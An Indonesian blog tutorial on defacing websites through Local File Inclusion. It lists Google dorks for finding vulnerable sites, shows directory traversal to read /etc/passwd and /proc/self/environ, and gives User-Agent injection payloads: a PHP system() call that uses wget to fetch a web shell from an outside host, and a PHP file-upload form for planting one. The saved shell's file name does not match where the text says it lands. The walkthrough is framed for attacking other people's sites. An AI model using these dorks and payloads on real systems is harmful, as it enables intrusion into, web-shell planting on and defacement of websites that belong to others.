Deface Poc Local File Inclusions (LFI)

Kali ini kita akan membahas sebuah poc yang sudah cukup bapuk. Yaitu Local File Inclusion. Tanpa basa basi langsung aja ke TKP lets gooooo

Dalam Tutorial Kali Ini Kita Hanya Membutuhkan Alat yaitu :

●Mozilla Browser

●Addons Tamper Data

 

Google Dorks :

  • inurl:/view/lang/index.php?page=?page=
  • inurl:/shared/help.php?page=
  • Inurl:.php?page=contact.php

Kembangin Mek
Pertama, test basic apa web tersebut vuln LFI.

Klo Vuln Langsung Ke Langkah Selanjutnya

  • localhost/view.php?page=email.php

Coba ganti email.php dengan ../../

  • localhost/view.php?page=../../

Jika kalian dapat error seperti

Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

Ini Tandanya Kita Dapat Membuka File Local Yang Lebih Sensitif
Kita coba panggil file /etc/passwd nya .

  • localhost/view.php?page=etc/passwd

Masih error ?

Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

Kita coba naikkan direktori nya.

  • localhost/view.php?page=../../../../../etc/passwd

Kalau masih error, naikkan terus direktori nya sampai file /etc/passwd nya kebaca.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin

Boommm v:

Sekarang kita coba panggil apakah proc/self/environ bisa diakses atau tidak.

  • localhost/view.php?page=../../../../../proc/self/environ
DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
REQUEST_METHOD= GET REQUEST_URI = /view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=hackers@site.com SERVER_NAME=localhost
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80

Berarti web tersebut bisa diinject. Kalau blank, berarti tidak bisa.
Langkah selanjutnya, aktifkan tamper data.
Load halaman localhost/view.php?page=../../../../../proc/self/environ
Lalu tamper.
pada user-agent di addons tamper data tadi isi dengan

<?system(‘wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php’);?>

Lalu submit.

Shell kalian akan terletak di

  • localhost/Ez.php

Pada beberapa kasus, fungsi system di server dimatikan sehingga kita tidak bisa melakukan wget melalui cara diatas.
Tapi ada cara lain.
Pad user-agent masukkan script uploader berikut :

<?php @copy($_FILES['file']['tmp_name'],$_FILES['file']['name']); ?><p>
<h1> shu </h1></p>
<br> <form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>

Setelah diupload, maka shell akan terletak di root path domain.

Post Created 3

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

Related Posts

Begin typing your search above and press enter to search. Press ESC to cancel.

Back To Top